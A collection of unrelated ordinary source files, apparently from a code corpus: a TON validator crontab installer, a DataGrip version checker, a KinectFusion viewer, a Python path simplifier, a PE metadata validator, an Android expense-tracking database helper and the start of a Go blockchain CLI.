CURRENT_CHG_TIME=`crontab -l |tail -n 1 | awk '{print $1 " " $2}'`
# Print a unix timestamp ($1) as "YYYY-mm-dd HH:MM:SS".
# GNU/Linux date reads timestamps via `-d @N`; BSD date via `-r N`.
# FIX: quote "$ival" to avoid word splitting; drop the redundant
# echo-"$( ... )" wrapper around date.
GET_F_T(){
OS_SYSTEM=$(uname)
ival="${1}"
if [[ "$OS_SYSTEM" == "Linux" ]];then
date +'%Y-%m-%d %H:%M:%S' -d @"$ival"
else
date -r "$ival" +'%Y-%m-%d %H:%M:%S'
fi
}
# Human-readable election start times for the log.
Curr_Elect_Time=$((CURR_VAL_UNTIL - STRT_BEFORE))
Next_Elect_Time=$((CURR_VAL_UNTIL + VAL_DUR - STRT_BEFORE))
echo
echo "Current elections time start: $Curr_Elect_Time / $(GET_F_T "$Curr_Elect_Time")"
echo "Next elections time start: $Next_Elect_Time / $(GET_F_T "$Next_Elect_Time")"
echo "-------------------------------------------------------------------"
# if [[ ! -z $NEXT_VAL__EXIST ]] && [[ "$election_id" == "0" ]];then
# NXT_ELECT_1=$PRV_ELECT_1
# NXT_ELECT_2=$PRV_ELECT_2
# NXT_ELECT_3=$PRV_ELECT_3
# NXT_ELECT_4=$PRV_ELECT_4
# fi
# sudo crontab -u $SCRPT_USER -r
# Build the crontab body as a heredoc. The only OS difference is the PATH
# line (FreeBSD vs Linux). NOTE: heredoc lines are crontab DATA — every job
# runs daily at the minute/hour computed above.
OS_SYSTEM=`uname -s`
FB_CT_HEADER=""
if [[ "$OS_SYSTEM" == "FreeBSD" ]];then
CRONT_JOBS=$(cat <<-_ENDCRN_
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/sbin:/usr/local/bin:$NODE_BIN_DIR
HOME=$USER_HOME
$NXT_ELECT_1 * * * cd ${SCRIPT_DIR} && ./prepare_elections.sh &>> ${TON_LOG_DIR}/validator.log
$NXT_ELECT_2 * * * cd ${SCRIPT_DIR} && ./take_part_in_elections.sh &>> ${TON_LOG_DIR}/validator.log
$NXT_ELECT_3 * * * cd ${SCRIPT_DIR} && ./next_elect_set_time.sh &>> ${TON_LOG_DIR}/validator.log && ./part_check.sh &>> ${TON_LOG_DIR}/validator.log
# $GPL_TIME_MH * * * cd ${SCRIPT_DIR} && ./get_participant_list.sh > ${ELECTIONS_HISTORY_DIR}/${election_id}_parts.lst && chmod 444 ${ELECTIONS_HISTORY_DIR}/${election_id}_parts.lst
_ENDCRN_
)
else
CRONT_JOBS=$(cat <<-_ENDCRN_
SHELL=/bin/bash
PATH=$NODE_BIN_DIR:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin
HOME=$USER_HOME
$NXT_ELECT_1 * * * cd ${SCRIPT_DIR} && ./prepare_elections.sh &>> ${TON_LOG_DIR}/validator.log
$NXT_ELECT_2 * * * cd ${SCRIPT_DIR} && ./take_part_in_elections.sh &>> ${TON_LOG_DIR}/validator.log
$NXT_ELECT_3 * * * cd ${SCRIPT_DIR} && ./next_elect_set_time.sh &>> ${TON_LOG_DIR}/validator.log && ./part_check.sh &>> ${TON_LOG_DIR}/validator.log
# $GPL_TIME_MH * * * script --return --quiet --append --command "cd ${SCRIPT_DIR} && ./get_participant_list.sh > ${ELECTIONS_HISTORY_DIR}/${election_id}_parts.lst && chmod 444 ${ELECTIONS_HISTORY_DIR}/${election_id}_parts.lst"
_ENDCRN_
)
fi
# "show" mode: print what would be installed and exit without touching crontab.
[[ "$1" == "show" ]] && echo "$CRONT_JOBS"&& exit 0
# Replace the user's crontab wholesale and echo the tail for confirmation.
echo "$CRONT_JOBS" | sudo crontab -u $SCRPT_USER -
sudo crontab -l -u $SCRPT_USER | tail -n 8
#=================================================
# for icinga
# Export the computed times so the monitoring check can verify them.
echo "# prepare , participation , next elections ( minute hour ) - for crontab" > "${nextElections}"
echo "INFO ELECTIONS
$NXT_ELECT_1
$NXT_ELECT_2
$NXT_ELECT_3
" >> "${nextElections}"
echo "-------------------------------------------------------------------"
echo "+++INFO: $(basename "$0") FINISHED $(date +%s) / $(date)"
echo "================================================================================================"
exit 0
|
#!/usr/bin/env bash
# Print the latest DataGrip (code "DG") release version reported by the
# JetBrains releases API, with any "v"/"release-" prefix stripped.
api_url="https://data.services.jetbrains.com/products?code=DG&release.type=release"
version=$(curl -sX GET "$api_url" | jq -r '.[0].releases[0].version')
version="${version#*v}"          # drop a leading "...v" prefix, if any
version="${version#*release-}"   # drop a leading "...release-" prefix, if any
printf "%s" "${version}"
|
<reponame>seichter/kfusion
/*
Copyright (c) 2011-2013 <NAME>, <NAME>
Permission is hereby granted, free of charge, to any person obtaining a
copy of this software and associated documentation files (the
"Software"), to deal in the Software without restriction, including
without limitation the rights to use, copy, modify, merge, publish,
distribute, sublicense, and/or sell copies of the Software, and to
permit persons to whom the Software is furnished to do so, subject to
the following conditions:
The above copyright notice and this permission notice shall be included
in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY
CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
*/
#include "kfusion.h"
#include "helpers.h"
#include "interface.h"
#include "perfstats.h"
#include <cstring>
#include <iostream>
#include <sstream>
#include <iomanip>
#include <cstdlib>
#include <cstring>
#ifdef __APPLE__
#include <GLUT/glut.h>
#elif defined(WIN32)
#define GLUT_NO_LIB_PRAGMA
#include <GL/glut.h>
#else
#include <GL/glut.h>
#endif
using namespace TooN;
KFusion kfusion;
Image<uchar4, HostDevice> lightScene, trackModel, lightModel, texModel;
Image<uint16_t, HostDevice> depthImage[2];
Image<uchar3, HostDevice> rgbImage;
const float3 light = make_float3(1, 1, -1.0);
const float3 ambient = make_float3(0.1, 0.1, 0.1);
SE3<float> initPose;
int counter = 0;
int integration_rate = 2;
bool reset = true;
bool should_integrate = true;
bool render_texture = false;
Image<float3, Device> pos, normals;
Image<float, Device> dep;
SE3<float> preTrans, trans, rot(makeVector(0.0, 0, 0, 0, 0, 0));
bool redraw_big_view = false;
std::unique_ptr<RGBD> rgbdDevice;
// Per-frame GLUT display callback:
//  1. upload the newest depth frame to the GPU and run KFusion tracking;
//  2. integrate + raycast every integration_rate-th frame (or while resetting);
//  3. render the debug views and the free "big" view (throttled to every
//     4th frame unless a key forced a redraw);
//  4. blit all five sub-images and accumulate/print perf stats.
void display(void){
    const uint2 imageSize = kfusion.configuration.inputSize;
    static bool integrate = true;
    glClear( GL_COLOR_BUFFER_BIT );
    const double startFrame = Stats.start();
    const double startProcessing = Stats.sample("kinect");
    // kfusion.setKinectDeviceDepth(depthImage[GetKinectFrame()].getDeviceImage());
    kfusion.setKinectDeviceDepth(depthImage[rgbdDevice->currentDepthBufferIndex()].getDeviceImage());
    Stats.sample("raw to cooked");
    integrate = kfusion.Track();
    Stats.sample("track");
    // Integrate only when tracking succeeded, at the configured rate —
    // but always while reset is pending so the volume gets bootstrapped.
    if((should_integrate && integrate && ((counter % integration_rate) == 0)) || reset){
        kfusion.Integrate();
        kfusion.Raycast();
        Stats.sample("integrate");
        if(counter > 2) // use the first two frames to initialize
            reset = false;
    }
    renderLight( lightScene.getDeviceImage(), kfusion.inputVertex[0], kfusion.inputNormal[0], light, ambient );
    renderLight( lightModel.getDeviceImage(), kfusion.vertex, kfusion.normal, light, ambient);
    renderTrackResult(trackModel.getDeviceImage(), kfusion.reduction);
    // The free-view raycast is expensive; refresh it only every 4th frame
    // or when the view transform changed (redraw_big_view).
    static int count = 4;
    if(count > 3 || redraw_big_view){
        renderInput( pos, normals, dep, kfusion.integration, toMatrix4( trans * rot * preTrans ) * getInverseCameraMatrix(kfusion.configuration.camera * 2), kfusion.configuration.nearPlane, kfusion.configuration.farPlane, kfusion.configuration.stepSize(), 0.75 * kfusion.configuration.mu);
        count = 0;
        redraw_big_view = false;
    } else
        count++;
    if(render_texture)
        renderTexture( texModel.getDeviceImage(), pos, normals, rgbImage.getDeviceImage(), getCameraMatrix(2*kfusion.configuration.camera) * inverse(kfusion.pose), light);
    else
        renderLight( texModel.getDeviceImage(), pos, normals, light, ambient);
    cudaDeviceSynchronize();
    Stats.sample("render");
    glClear(GL_COLOR_BUFFER_BIT);
    glRasterPos2i(0, 0);
    glDrawPixels(lightScene); // left top
    glRasterPos2i(0, 240);
    glPixelZoom(0.5, -0.5);
    glDrawPixels(rgbImage); // left bottom
    glPixelZoom(1,-1);
    glRasterPos2i(320,0);
    glDrawPixels(lightModel); // middle top
    glRasterPos2i(320,240);
    glDrawPixels(trackModel); // middle bottom
    glRasterPos2i(640, 0);
    glDrawPixels(texModel); // right
    const double endProcessing = Stats.sample("draw");
    Stats.sample("total", endProcessing - startFrame, PerfStats::TIME);
    Stats.sample("total_proc", endProcessing - startProcessing, PerfStats::TIME);
    if(printCUDAError())
        exit(1);
    ++counter;
    // Dump perf statistics every 50 frames.
    if(counter % 50 == 0){
        Stats.print();
        Stats.reset();
        std::cout << std::endl;
    }
    glutSwapBuffers();
}
// GLUT idle callback: request a redraw whenever the capture device
// reports that a new frame is available.
void idle(void){
    if (!rgbdDevice->available())
        return;
    glutPostRedisplay();
}
// Keyboard handler:
//   c - clear the reconstruction and restore the initial pose
//   q - quit
//   i - toggle volume integration
//   t - toggle textured rendering of the model view
void keys(unsigned char key, int x, int y){
    if (key == 'c') {
        kfusion.Reset();
        kfusion.setPose(toMatrix4(initPose));
        reset = true;
    } else if (key == 'q') {
        exit(0);
    } else if (key == 'i') {
        should_integrate = !should_integrate;
    } else if (key == 't') {
        render_texture = !render_texture;
    }
}
// Arrow keys rotate the free-view camera used for the big right-hand view.
// NOTE(review): left/right PRE-multiply `rot` while up/down POST-multiply it,
// so the two axes compose differently — looks intentional, but confirm before
// "simplifying". A redraw of the big view is forced afterwards.
void specials(int key, int x, int y){
    switch(key){
    case GLUT_KEY_LEFT:
        rot = SE3<float>(makeVector(0.0, 0, 0, 0, 0.1, 0)) * rot;
        break;
    case GLUT_KEY_RIGHT:
        rot = SE3<float>(makeVector(0.0, 0, 0, 0, -0.1, 0)) * rot;
        break;
    case GLUT_KEY_UP:
        rot *= SE3<float>(makeVector(0.0, 0, 0, -0.1, 0, 0));
        break;
    case GLUT_KEY_DOWN:
        rot *= SE3<float>(makeVector(0.0, 0, 0, 0.1, 0, 0));
        break;
    }
    redraw_big_view = true;
}
// GLUT reshape callback: sets up a pixel-aligned orthographic projection so
// glDrawPixels/glRasterPos work in window coordinates with (0,0) top-left.
void reshape(int width, int height){
    glMatrixMode(GL_MODELVIEW);
    glLoadIdentity();
    glViewport(0, 0, width, height);
    glMatrixMode(GL_PROJECTION);
    glLoadIdentity();
    glColor3f(1.0f,1.0f,1.0f);
    glRasterPos2f(-1, 1);
    glOrtho(-0.375, width-0.375, height-0.375, -0.375, -1 , 1); //offsets to make (0,0) the top left pixel (rather than off the display)
    glPixelZoom(1,-1); // flip vertically: image rows are top-to-bottom
}
// atexit handler: close the capture device, free KFusion's buffers and
// reset the CUDA device so profiling data is flushed.
void exitFunc(void)
{
    rgbdDevice->close();
    kfusion.Clear();
    cudaDeviceReset();
}
// Program entry point: parse optional CLI arguments
// (size, dist_threshold, normal_threshold), configure KFusion, open the
// RGBD capture device, allocate host/device buffers, wire up GLUT callbacks
// and enter the main loop.
int main(int argc, char ** argv) {
    const float default_size = 2.f;
    KFusionConfig config;
    // Search for --help argument
    for (int i = 0; i < argc; ++i) {
        if (std::string(argv[i]) == "--help") {
            std::cout << "Usage: " << argv[0] << " [size] [dist_threshold] [normal_threshold]" << std::endl;
            std::cout << std::endl;
            std::cout << "Defaults:" << std::endl;
            std::cout << "  size:             " << default_size << std::endl;
            std::cout << "  dist_threshold:   " << config.dist_threshold << std::endl;
            std::cout << "  normal_threshold: " << config.normal_threshold << std::endl;
            return 0;
        }
    }
    const float size = (argc > 1) ? atof(argv[1]) : default_size;
    // it is enough now to set the volume resolution once.
    // everything else is derived from that.
    // config.volumeSize = make_uint3(64);
    // config.volumeSize = make_uint3(128);
    // config.volumeSize = make_uint3(256);
    config.volumeSize = make_uint3(512);
    // these are physical dimensions in meters
    config.volumeDimensions = make_float3(size);
    config.nearPlane = 0.4f;
    config.farPlane = 5.0f;
    config.mu = 0.1;
    config.combinedTrackAndReduce = false;
    // change the following parameters for using 640 x 480 input images
    config.inputSize = make_uint2(320,240);
    // config.inputSize = make_uint2(640,480);
    config.camera = make_float4(531.15/2, 531.15/2, 640/4, 480/4);
    // config.camera = make_float4(614.221/2, 614.221/2, 640/4, 480/4);
    // config.iterations is a vector<int>, the length determines
    // the number of levels to be used in tracking
    // push back more then 3 iteraton numbers to get more levels.
    config.iterations[0] = 10;
    config.iterations[1] = 5;
    config.iterations[2] = 4;
    config.dist_threshold = (argc > 2 ) ? atof(argv[2]) : config.dist_threshold;
    config.normal_threshold = (argc > 3 ) ? atof(argv[3]) : config.normal_threshold;
    // Start in the middle of the front volume face.
    initPose = SE3<float>(makeVector(size/2, size/2, 0, 0, 0, 0));
    // rgbdDevice = RGBD::create(RGBD::kRGBDDeviceKinect);
    // rgbdDevice = RGBD::create(RGBD::kRGBDRealSense);
    rgbdDevice.reset(RGBD::create(RGBD::kRGBDDeviceOpenNI2));
    // FIX: idiomatic null check on the unique_ptr instead of comparing to 0L.
    if (!rgbdDevice) {
        std::cerr << "no capture device" << std::endl;
        return -1;
    }
    glutInit(&argc, argv);
    glutInitDisplayMode(GLUT_RGBA | GLUT_DOUBLE );
    glutInitWindowSize(config.inputSize.x * 2 + 640, max(config.inputSize.y * 2, 480));
    glutCreateWindow("kfusion");
    kfusion.Init(config);
    // input buffers
    depthImage[0].alloc(make_uint2(640, 480));
    depthImage[1].alloc(make_uint2(640, 480));
    rgbImage.alloc(make_uint2(640, 480));
    // render buffers
    lightScene.alloc(config.inputSize), trackModel.alloc(config.inputSize), lightModel.alloc(config.inputSize);
    pos.alloc(make_uint2(640, 480)), normals.alloc(make_uint2(640, 480)), dep.alloc(make_uint2(640, 480)), texModel.alloc(make_uint2(640, 480));
    if(printCUDAError()) {
        cudaDeviceReset();
        return 1;
    }
    std::cout << "Using depthImage size: " << depthImage[0].size.x*depthImage[0].size.y * sizeof(uint16_t) << " bytes " << std::endl;
    std::cout << "Using rgbImage size: " << rgbImage.size.x*rgbImage.size.y * sizeof(uchar3) << " bytes " << std::endl;
    // Zero the capture buffers so the first frames are well-defined.
    memset(depthImage[0].data(), 0, depthImage[0].size.x*depthImage[0].size.y * sizeof(uint16_t));
    memset(depthImage[1].data(), 0, depthImage[1].size.x*depthImage[1].size.y * sizeof(uint16_t));
    memset(rgbImage.data(), 0, rgbImage.size.x*rgbImage.size.y * sizeof(uchar3));
    // Hand the double-buffered depth storage (and RGB) to the device driver.
    uint16_t * buffers[2] = {depthImage[0].data(), depthImage[1].data()};
    rgbdDevice->setBuffers(buffers, (unsigned char *)rgbImage.data());
    // open() returns non-zero on failure.
    if (rgbdDevice->open()){
        cudaDeviceReset();
        return 1;
    }
    kfusion.setPose(toMatrix4(initPose));
    // model rendering parameters
    preTrans = SE3<float>::exp(makeVector(0.0, 0, -size, 0, 0, 0));
    trans = SE3<float>::exp(makeVector(0.5, 0.5, 0.5, 0, 0, 0) * size);
    atexit(exitFunc);
    glutDisplayFunc(display);
    glutKeyboardFunc(keys);
    glutSpecialFunc(specials);
    glutReshapeFunc(reshape);
    glutIdleFunc(idle);
    glutMainLoop();
    return 0;
}
|
<gh_stars>10-100
// Modal for force-ending an instance: the OK button requires a non-empty
// reason before delegating to InstanceManager; otherwise it shows a
// localized error toast.
Template.force_end_modal.helpers({
})

Template.force_end_modal.events({
  'click #force_end_modal_ok': function (event, template) {
    var reason = $("#force_end_modal_text").val();
    if (reason) {
      InstanceManager.terminateIns(reason);
    } else {
      toastr.error(TAPi18n.__("instance_cancel_error_reason_required"));
    }
  },
})
def simplify_path(path: str) -> str:
    """Collapse a Unix-style path to its canonical form.

    Empty components and ``.`` are dropped, ``..`` pops the previous
    component (and is ignored at the root), and the result always starts
    with a single ``/`` with no trailing slash (except for the root itself).

    :param path: absolute Unix-style path, possibly with ``.``/``..``/``//``
    :return: the simplified canonical path
    """
    stack = []
    for component in path.split('/'):
        # '' arises from '//' or leading/trailing slashes; '.' is a no-op.
        if component in ('', '.'):
            continue
        if component == '..':
            # Go up one level; '..' at the root is silently ignored.
            if stack:
                stack.pop()
        else:
            stack.append(component)
    # The original ended with `x if x != '/' else x`, a dead conditional
    # whose branches were identical; a plain return is equivalent.
    return '/' + '/'.join(stack)
#!/bin/bash
# Create the config.js to provide client run-time config variables.
# Each JS_* variable may be overridden from the environment; otherwise a
# local-development default is used.
C=dist/server/public/app/js/config.js
# ${VAR:-default} substitutes the default when VAR is unset or empty —
# equivalent to the previous `[ -z ... ] && echo default || echo $VAR`
# backtick chains, but without spawning subshells.
JS_APP_SERVER_URL="${JS_APP_SERVER_URL:-http://localhost:3070/app}"
JS_API_SERVER_URL="${JS_API_SERVER_URL:-http://localhost:3060}"
JS_WIDGET_URL="${JS_WIDGET_URL:-http://localhost:3061/widget}"
JS_API_PATH="${JS_API_PATH:-/api}"
# -n: no trailing newline; the file is a single JS statement.
echo -n "window.b2note = { appServerUrl: '$JS_APP_SERVER_URL', apiServerUrl: '$JS_API_SERVER_URL', widgetUrl: '$JS_WIDGET_URL', apiPath: '$JS_API_PATH' };" > "$C"
echo "$C created"
class PEFileValidator:
    """Validation helpers for parsed PE-file metadata dictionaries."""

    def validate_data_directories(self, fileinfo):
        """Return True when ``fileinfo`` describes a PE file whose 15th
        data-directory entry is present, indexed 14, and non-empty.

        ``fileinfo`` must contain at least a ``fileFormat`` key; every
        other missing piece of information yields False.
        """
        # Only PE files carry the data-directory table checked here.
        if fileinfo['fileFormat'] != 'PE':
            return False
        if 'dataDirectories' not in fileinfo:
            return False
        directories = fileinfo['dataDirectories']
        if 'numberOfDataDirectories' not in directories:
            return False
        # The header must declare exactly 15 directories...
        if directories['numberOfDataDirectories'] != 15:
            return False
        entries = directories.get('dataDirectoryEntries', [])
        # ...and the entry list must actually provide at least 15 of them.
        if len(entries) < 15:
            return False
        fifteenth = entries[14]
        # The 15th entry must be self-indexed 14 with a non-zero
        # address and size.
        if fifteenth.get('index') != 14:
            return False
        if fifteenth.get('address', 0) == 0 or fifteenth.get('size', 0) == 0:
            return False
        return True
# Example usage:
# NOTE(review): as literally written, 'dataDirectoryEntries' holds a single
# entry, so validate_data_directories() returns False (it requires at least
# 15 entries). The "... 14 previous entries ..." placeholder must be filled
# in with real entries for the example to print True.
fileinfo = {
    'fileFormat': 'PE',
    'dataDirectories': {
        'numberOfDataDirectories': 15,
        'dataDirectoryEntries': [
            # ... 14 previous entries ...
            {'index': 14, 'address': 12345, 'size': 67890}
        ]
    }
}
validator = PEFileValidator()
result = validator.validate_data_directories(fileinfo)
print(result)  # Output: False as written; True once all 15 entries are supplied
<filename>app/src/main/java/br/com/mbecker/jagastei/db/JaGasteiDbHelper.java
package br.com.mbecker.jagastei.db;
import android.content.ContentValues;
import android.content.Context;
import android.database.Cursor;
import android.database.sqlite.SQLiteDatabase;
import android.database.sqlite.SQLiteOpenHelper;
import android.util.Log;
import java.util.ArrayList;
import java.util.Arrays;
import java.util.HashMap;
import java.util.HashSet;
import java.util.List;
import java.util.Map;
import java.util.Set;
import br.com.mbecker.jagastei.domain.ServiceDomain;
import br.com.mbecker.jagastei.util.TagUtil;
/**
 * SQLite helper that owns the "JaGastei.db" database: creates the gasto and
 * tag tables, migrates v1 -> v2 data, and implements the ServiceDomain
 * persistence operations.
 */
public class JaGasteiDbHelper extends SQLiteOpenHelper implements ServiceDomain {
    // Bumping DATABASE_VERSION triggers onUpgrade/onDowngrade on existing installs.
    private static final int DATABASE_VERSION = 2;
    private static final String DATABASE_NAME = "JaGastei.db";
    public JaGasteiDbHelper(Context context) {
        super(context, DATABASE_NAME, null, DATABASE_VERSION);
    }
    // Creates both tables on a fresh install (schema is already at v2).
    public void onCreate(SQLiteDatabase db) {
        db.execSQL(JaGasteiContract.SQL_CREATE_GASTO);
        db.execSQL(JaGasteiContract.SQL_CREATE_TAG);
    }
    // v1 -> v2: add the tag table, then derive tags from existing gasto rows.
    public void onUpgrade(SQLiteDatabase db, int oldVersion, int newVersion) {
        switch (newVersion) {
            case 2:
                db.execSQL(JaGasteiContract.SQL_CREATE_TAG);
                migrarVersao2(db);
                break;
        }
    }
    // NOTE(review): switching on oldVersion here drops the tag table when
    // downgrading from v2; case 1 (dropping gasto) looks unreachable for a
    // downgrade — confirm the intended semantics.
    public void onDowngrade(SQLiteDatabase db, int oldVersion, int newVersion) {
        switch (oldVersion) {
            case 1:
                db.execSQL(JaGasteiContract.SQL_DELETE_GASTO);
                break;
            case 2:
                db.execSQL(JaGasteiContract.SQL_DELETE_TAG);
                break;
        }
    }
    /**
     * v2 migration: normalizes each gasto's obs text (";" -> ",", spaces ->
     * ";", lowercased), writes it back, and builds one tag row per distinct
     * token holding a ";"-separated list of gasto ids.
     */
    private void migrarVersao2(SQLiteDatabase db) {
        Cursor c = db.query(JaGasteiContract.GastoEntry.TABLE_NAME, new String[]{JaGasteiContract.GastoEntry._ID, JaGasteiContract.GastoEntry.COLUMN_NAME_OBS}, null, null, null, null, null);
        // NOTE(review): c is only closed inside this branch; an empty cursor
        // is never closed.
        if (c.moveToFirst()) {
            // tag token -> ";"-joined gasto ids.
            Map<String, String> mapTags = new HashMap<>(20);
            do {
                long id = c.getLong(c.getColumnIndex(JaGasteiContract.GastoEntry._ID));
                String obs = c.getString(c.getColumnIndex(JaGasteiContract.GastoEntry.COLUMN_NAME_OBS));
                // Rows without observations contribute no tags.
                if (obs == null || obs.trim().isEmpty()) {
                    continue;
                }
                // Normalize separators so each whitespace-delimited word
                // becomes one ";"-delimited tag token.
                obs = obs.replaceAll(";", ",").replaceAll(" ", ";").toLowerCase();
                ContentValues cv = new ContentValues();
                cv.put(JaGasteiContract.GastoEntry.COLUMN_NAME_OBS, obs);
                db.update(JaGasteiContract.GastoEntry.TABLE_NAME, cv, "_id = ?", new String[]{String.valueOf(id)});
                String[] tags = obs.split(";");
                for (String t : tags) {
                    // Append this gasto's id to the tag's id list (or start one).
                    String idTags = mapTags.get(t);
                    if (idTags != null) {
                        idTags += ";" + id;
                    } else {
                        idTags = String.valueOf(id);
                    }
                    mapTags.put(t, idTags);
                }
            } while (c.moveToNext());
            c.close();
            // NOTE(review): Map.forEach requires Android API 24+ — confirm minSdk.
            mapTags.forEach((k, v) -> {
                ContentValues cv = new ContentValues();
                cv.put(JaGasteiContract.TagEntry.COLUMN_NAME_TAG_NAME, k);
                cv.put(JaGasteiContract.TagEntry.COLUMN_NAME_ID_GASTO, v);
                db.insert(JaGasteiContract.TagEntry.TABLE_NAME, null, cv);
            });
        }
    }
    /**
     * Inserts a gasto row and returns its new row id. Returns 0 if an
     * exception was caught (and -1 if the insert itself fails, per
     * SQLiteDatabase.insert).
     */
    @Override
    public long salvarGasto(GastoModel g) {
        long id = 0;
        // try-with-resources closes the database handle on every path.
        try (SQLiteDatabase db = getWritableDatabase()) {
            ContentValues values = new ContentValues();
            values.put(JaGasteiContract.GastoEntry.COLUMN_NAME_VALOR, g.getValor());
            values.put(JaGasteiContract.GastoEntry.COLUMN_NAME_QUANDO, g.getQuandoToTime());
            values.put(JaGasteiContract.GastoEntry.COLUMN_NAME_MESANO, g.getMesAno());
            values.put(JaGasteiContract.GastoEntry.COLUMN_NAME_LAT, g.getLat());
            values.put(JaGasteiContract.GastoEntry.COLUMN_NAME_LNG, g.getLng());
            values.put(JaGasteiContract.GastoEntry.COLUMN_NAME_OBS, g.getObs());
            id = db.insert(JaGasteiContract.GastoEntry.TABLE_NAME, null, values);
        } catch (Exception e) {
            // Best-effort: failures are only logged, caller sees id == 0.
            Log.d(getClass().getName(), "salvarGasto: " + e.getMessage());
        }
        return id;
    }
    /**
     * Lists gastos, optionally filtered by month/year; a null mesAno returns
     * every row.
     */
    @Override
    public List<GastoModel> listarGastos(String mesAno) {
        SQLiteDatabase db = getReadableDatabase();
        Cursor c;
        if (mesAno == null) {
            c = db.query(JaGasteiContract.GastoEntry.TABLE_NAME, null, null, null, null, null, null);
        } else {
            // 8-arg overload: trailing null is the (unused) LIMIT clause.
            c = db.query(JaGasteiContract.GastoEntry.TABLE_NAME, null, JaGasteiContract.GastoEntry.COLUMN_NAME_MESANO + "=?", new String[]{mesAno}, null, null, null, null);
        }
        return ModelBuilder.buildGastoLista(c);
    }
    /**
     * Resolves a tag row to its ";"-separated gasto id list, then loads each
     * gasto individually (one query per id).
     */
    @Override
    public List<GastoModel> listarGastosPorTag(long tagId) {
        List<GastoModel> result = new ArrayList<>(30);
        SQLiteDatabase db = getReadableDatabase();
        Cursor tagCursor = db.query(JaGasteiContract.TagEntry.TABLE_NAME, new String[]{JaGasteiContract.TagEntry.COLUMN_NAME_ID_GASTO}, JaGasteiContract.TagEntry._ID + "=?", new String[]{String.valueOf(tagId)}, null, null, null, "1");
        if (tagCursor.moveToFirst()) {
            String gastos = tagCursor.getString(tagCursor.getColumnIndex(JaGasteiContract.TagEntry.COLUMN_NAME_ID_GASTO));
            Long[] ids = TagUtil.splitGastos(gastos);
            for (Long id : ids) {
                Cursor gastoCursor = db.query(JaGasteiContract.GastoEntry.TABLE_NAME, null, JaGasteiContract.GastoEntry._ID + "=?", new String[]{String.valueOf(id)}, null, null, null, "1");
                if (gastoCursor.moveToFirst()) {
                    GastoModel g = ModelBuilder.buildGasto(gastoCursor);
                    result.add(g);
                }
                gastoCursor.close();
            }
        }
        tagCursor.close();
        return result;
    }
    /** Returns every tag row. */
    @Override
    public List<TagModel> listarTags() {
        SQLiteDatabase db = getReadableDatabase();
        Cursor c = db.query(JaGasteiContract.TagEntry.TABLE_NAME, null, null, null, null, null, null);
        return ModelBuilder.buildTagLista(c);
    }
    /**
     * Associates gasto {@code id} with each tag name: appends the id to an
     * existing tag's id list (deduplicated via a Set) or inserts a new tag row.
     */
    @Override
    public void atualizaTags(long id, List<String> tags) {
        Cursor c;
        SQLiteDatabase db = getWritableDatabase();
        for (String t : tags) {
            c = db.query(JaGasteiContract.TagEntry.TABLE_NAME, null, JaGasteiContract.TagEntry.COLUMN_NAME_TAG_NAME + "=?", new String[]{t}, null, null, null, "1");
            // NOTE(review): c is only closed in this branch; the else branch
            // leaks the cursor.
            if (c.moveToFirst()) {
                TagModel tagModel = ModelBuilder.buildTag(c);
                Set<Long> newTags = new HashSet<>(Arrays.asList(tagModel.getGastos()));
                newTags.add(id);
                // Only rewrite the row when the id was not already present.
                if (newTags.size() > tagModel.getGastos().length) {
                    ContentValues cv = new ContentValues();
                    cv.put(JaGasteiContract.TagEntry.COLUMN_NAME_TAG_NAME, t);
                    cv.put(JaGasteiContract.TagEntry.COLUMN_NAME_ID_GASTO, TagUtil.tagsGastosToString(newTags));
                    db.update(JaGasteiContract.TagEntry.TABLE_NAME, cv, JaGasteiContract.TagEntry._ID + "=?", new String[]{String.valueOf(tagModel.getId())});
                }
                c.close();
            } else {
                ContentValues cv = new ContentValues();
                cv.put(JaGasteiContract.TagEntry.COLUMN_NAME_TAG_NAME, t);
                cv.put(JaGasteiContract.TagEntry.COLUMN_NAME_ID_GASTO, String.valueOf(id));
                db.insert(JaGasteiContract.TagEntry.TABLE_NAME, null, cv);
            }
        }
    }
    /*
    public String totalMes(String mesAno) {
        double res = 0;
        SQLiteDatabase db = getReadableDatabase();
        Cursor c = db.rawQuery(JaGasteiContract.SQL_TOTAL_MES, new String[]{mesAno});
        if (c.moveToFirst()) {
            res = c.getDouble(0);
        }
        c.close();
        return Util.frmValor(res);
    }
    */
}
|
package main
import (
	"errors"
	"fmt"
	"os"

	"github.com/simone-trubian/blockchain-tutorial/fs"
	"github.com/spf13/cobra"
)
// Names of the CLI flags shared by the sb sub-commands.
const flagDataDir = "datadir"
const flagPort = "port"
const flagIP = "ip"
const flagMiner = "miner"
const flagBootstrapAcc = "bootstrap-account"
const flagBootstrapIp = "bootstrap-ip"
const flagBootstrapPort = "bootstrap-port"
// main assembles the sb root command, attaches the sub-commands and runs
// the CLI, exiting non-zero on any execution error.
func main() {
	rootCmd := &cobra.Command{
		Use:   "sb",
		Short: "Simone's blockchain command line interface",
		Run:   func(cmd *cobra.Command, args []string) {},
	}

	rootCmd.AddCommand(versionCmd)
	rootCmd.AddCommand(runCmd())
	rootCmd.AddCommand(balancesCmd())
	rootCmd.AddCommand(walletCmd())

	if err := rootCmd.Execute(); err != nil {
		fmt.Fprintln(os.Stderr, err)
		os.Exit(1)
	}
}
// addDefaultRequiredFlags registers the mandatory --datadir flag on cmd.
func addDefaultRequiredFlags(cmd *cobra.Command) {
	flags := cmd.Flags()
	flags.String(
		flagDataDir,
		"",
		"Absolute path to the node data dir where the DB will/is stored")
	cmd.MarkFlagRequired(flagDataDir)
}
// getDataDirFromCmd reads the --datadir flag from cmd and returns it with
// any shell-style shorthand expanded by the fs package.
func getDataDirFromCmd(cmd *cobra.Command) string {
	rawDir, _ := cmd.Flags().GetString(flagDataDir)
	return fs.ExpandPath(rawDir)
}
// incorrectUsageErr returns the generic error reported when a command is
// invoked with invalid arguments.
func incorrectUsageErr() error {
